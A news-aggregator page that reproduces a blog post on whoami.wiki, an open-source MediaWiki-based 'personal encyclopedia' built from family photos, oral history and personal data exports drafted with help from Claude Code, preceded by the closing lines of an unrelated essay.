If that does­n’t bother you, I don’t know how to make it bother you. Based on eco­nomic and mar­ket ef­fi­ciency prin­ci­ples alone, this young man’s be­hav­ior is de­fen­si­ble. But there is moral­ity out­side of mar­kets. There is more to life than the ef­fi­ciency of in­for­ma­tion net­works. But will we re­dis­cover it, any time soon? Don’t bet on it.

...

Read the original on www.derekthompson.org »

10 828 shares, 32 trendiness

Personal Encyclopedias — whoami.wiki

Last year, I vis­ited my grand­moth­er’s house for the first time af­ter the pan­demic and came across a cup­board full of loose old pho­tos. I counted 1,351 of them span­ning all the way from my grand­par­ents in their early 20s, my mom as a baby, to me in mid­dle school, just around the time when we got our first smart­phone and all pho­tos since then were backed up on­line.

Everything was all over the place so I spent some time go­ing through them in­di­vid­u­ally and or­ga­niz­ing them into groups. Some of the ini­tial groups were based on the phys­i­cal at­trib­utes of the pho­to­graph like sim­i­lar as­pect ra­tios or film stock. For ex­am­ple, there was a group of black/​white 32mm square pic­tures that were taken around the time when my grand­fa­ther was in his mid 20s.

As I got done with group­ing all of them, I was able to see flashes of sto­ries in my head, but they were ephemeral and frag­ile. For in­stance, there was a group of pho­tos that looked like it was taken dur­ing my grand­par­ents’ wed­ding but I did­n’t know the chrono­log­i­cal or­der they were taken be­cause EXIF meta­data did­n’t ex­ist around that time.

So I sat down with my grand­mother and asked her to re­order the pho­tos and tell me every­thing she could re­mem­ber about her wed­ding. Her face lit up as she nar­rated the back­story be­hind the oc­ca­sion, go­ing from photo to photo, resur­fac­ing de­tails that had been dor­mant for decades. I wrote every­thing down, recorded the names of peo­ple in some of the pho­tos, some of whom I rec­og­nized as younger ver­sions of my un­cles and aunts.

After the interview”, I had mul­ti­ple pages of notes con­nect­ing the pho­tos to events that hap­pened 50 years ago. Since the ac­count was his­tor­i­cal, as an in­side joke I wanted to see if I could clean it up and pre­sent it as a page on Wikipedia so I could print it and give it to her. So I cloned MediaWiki, spun up a lo­cal in­stance, and be­gan my ed­i­to­r­ial work. I used the 2011 Royal Wedding as ref­er­ence and drafted a page start­ing with the clas­sic in­fobox and the lead para­graph.

I split up the rest of the con­tent into sec­tions and filled them with every­thing I could ver­ify like dates, names, places, who sat where. I scanned all the pho­tos and spent some time fig­ur­ing out what to place where. For every photo place­ment, there was a fol­low up to in­clude a de­scrip­tive cap­tion too.

Whenever I men­tioned a per­son, I linked them to an empty stub page. After I found out I could also link to the real Wikipedia, I was able to link things to real pages that pro­vided wider con­text to things like venues, rit­u­als, and the po­lit­i­cal cli­mate around that time, like for in­stance a le­gal amend­ment that was rel­e­vant to the wed­ding cer­e­mony.

In two evenings, I was able to doc­u­ment a full back­story for the pho­tos into a neat ar­ti­cle. These two evenings also made me re­al­ize just how pow­er­ful en­cy­clo­pe­dia soft­ware is to record and pre­serve me­dia and knowl­edge that would’ve oth­er­wise been lost over time.

This was so much fun that I spent the fol­low­ing months writ­ing pages to ac­count for all the pho­tos that needed to be stitched to­gether.

I got help from r/​ge­neal­ogy about how to ap­proach record­ing oral his­tory and I was given re­sources to bet­ter con­duct in­ter­views, shoutout to u/​stem­ma­tis! I would get on calls with my grand­mother and peo­ple in the fam­ily, ask them a cou­ple of ques­tions, and then write. It was also around this time that I be­gan us­ing au­dio tran­scrip­tion and lan­guage mod­els to make the ed­i­to­r­ial process eas­ier.

Over time, I man­aged to write a lot of pages con­nect­ing peo­ple to dif­fer­ent life events. The en­cy­clo­pe­dia for­mat made it easy to con­nect dots I would have never found on my own, like dis­cov­er­ing that one of the singers at my grand­par­ents’ wed­ding was the same nurse who helped de­liver me.

After find­ing all the sto­ries be­hind the phys­i­cal pho­tos, I started to work on dig­i­tal pho­tos and videos that I had stored on Google Photos. The won­der­ful thing about dig­i­tal pho­tos is that they come with EXIF meta­data that can re­veal ex­tra in­for­ma­tion like date, time, and some­times ge­o­graph­i­cal co­or­di­nates.

This time, with­out any in­ter­views, I wanted to see if I could use a lan­guage model to cre­ate a page based on just brows­ing through the pho­tos. As my first ex­per­i­ment, I cre­ated a folder with 625 pho­tos of a fam­ily trip to Coorg back in 2012.

I pointed Claude Code at the di­rec­tory and asked it to draft a wiki page by brows­ing through the im­ages. I hinted at us­ing ImageMagick to cre­ate con­tact sheets so it would help with brows­ing through mul­ti­ple pho­tos at once.

After a few min­utes and a cou­ple of to­kens later, it had cre­ated a com­pelling draft with a de­tailed ac­count of every­thing we did dur­ing the trip by time of day. The model had no lo­ca­tion data to work with, just time­stamps and vi­sual con­tent, but it was able to iden­tify the places from the pho­tos alone, in­clud­ing ones that I had for­got­ten by now. It picked up de­tails on the modes of trans­porta­tion we used to get be­tween places just from what it could see.

After I had clar­i­fied who some of the peo­ple in the pic­tures were, it went on to iden­tify them au­to­mat­i­cally in the cap­tions. Now that I had a de­tailed out­line ready, the page still only had con­tent based on the avail­able data, so to fill in the gaps I shared a list of anec­dotes from my point of view and the model in­serted them into places where the nar­ra­tive called for them.

The Coorg trip only had pho­tos to work with. My trip to Mexico City in 2022 had a lot more. I had taken 291 pho­tos and 343 videos with an iPhone 12 Pro that in­cluded ge­o­graph­i­cal co­or­di­nates as part of the EXIF meta­data.

On top of that, I ex­ported my lo­ca­tion time­line from Google Maps, my Uber trips, my bank trans­ac­tions, and Shazam his­tory. I would ask Claude Code to start with the pho­tos and then grad­u­ally give it ac­cess to the dif­fer­ent data ex­ports.

Here are some of the things it did across mul­ti­ple runs:

It cross-ref­er­enced my bank trans­ac­tions with lo­ca­tion data to as­cer­tain the restau­rants I went to.

Some of the pho­tos and videos showed me in at­ten­dance at a soc­cer match, how­ever, it was un­known which teams were play­ing. The model looked up my bank trans­ac­tions and found a Ticketmaster in­voice with in­for­ma­tion about the teams and name of the tour­na­ment.

It looked up my Uber trips to fig­ure out travel times and ex­act lo­ca­tions of pickup and drop.

It used my Shazam tracks to write about the kinds of songs that were play­ing at a place, like Cuban songs at a Cuban restau­rant.

In a fol­low-up, I men­tioned re­mem­ber­ing an evening din­ner with a gui­tarist play­ing in the back­ground. It fil­tered my me­dia to evening cap­tures, found a frame in a video with the gui­tarist, up­loaded it, and ref­er­enced the mo­ment in the page.

The MediaWiki ar­chi­tec­ture worked well with the ed­its, since for every new data source it would make amend­ments like a real Wikipedia con­trib­u­tor would. I leaned heav­ily on fea­tures that al­ready ex­isted. Talk pages to clar­ify gaps and con­sol­i­date re­search notes, cat­e­gories to group pages by theme, re­vi­sion his­tory to track how a page evolved as new data came in. I did­n’t have to build any of this, it was all just there.

What started as me help­ing the model fill in gaps from my mem­ory grad­u­ally in­verted. The model was now sur­fac­ing things I had com­pletely for­got­ten, cross-ref­er­enc­ing de­tails across data sources in ways I never would have done man­u­ally.

So I started point­ing Claude Code at other data ex­ports. My Facebook, Instagram, and WhatsApp archives held around 100k mes­sages and a cou­ple thou­sand voice notes ex­changed with close friends over a decade.

The model traced the arc of our friend­ships through the mes­sages, pulled out the life episodes we had talked each other through, and wove them into mul­ti­ple pages that read like it was writ­ten by some­one who knew us both. When I shared the pages with my friends, they wanted to read every sin­gle one.

This is when I re­al­ized I was no longer work­ing on a fam­ily his­tory pro­ject. What I had been build­ing, page by page, was a per­sonal en­cy­clo­pe­dia. A struc­tured, brows­able, in­ter­con­nected ac­count of my life com­piled from the data I al­ready had ly­ing around.

I’ve been work­ing on this as whoami.wiki. It uses MediaWiki as its foun­da­tion, which turns out to be a great fit be­cause lan­guage mod­els al­ready un­der­stand Wikipedia con­ven­tions deeply from their train­ing data. You bring your data ex­ports, and agents draft the pages for you to re­view.

A page about your grand­moth­er’s wed­ding works the same way as a page about a royal wed­ding. A page about your best friend works the same way as a page about a pub­lic fig­ure.

Oh and it’s gen­uinely fun! Putting to­gether the en­cy­clo­pe­dia felt like the early days of Facebook time­line, brows­ing through fin­ished pages, fol­low­ing links be­tween peo­ple and events, and stum­bling on a de­tail I for­got.

But more than the tech­nol­ogy, it’s the sto­ries that stayed with me. Writing about my grand­moth­er’s life sur­faced things I’d never known, her years as a sin­gle mother, the de­ci­sions she had to make, the re­silience it took. She was a stronger woman than I ever re­al­ized. Going through my friend­ships, I found mo­ments of en­dear­ment that I had nearly for­got­ten, the days friends went the ex­tra mile to be good to me. Seeing those mo­ments laid out on a page made me pick up the phone and call a few of them. The en­cy­clo­pe­dia did­n’t just or­ga­nize my data, it made me pay closer at­ten­tion to the peo­ple in my life.

Today I’m re­leas­ing whoami.wiki as an open source pro­ject. The en­cy­clo­pe­dia is yours, it runs on your ma­chine, your data stays with you, and any model can read it. The pro­ject is early and I’m still fig­ur­ing a lot of it out, but if this sounds in­ter­est­ing, you can get started here and tell me what you think!

...

Read the original on whoami.wiki »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.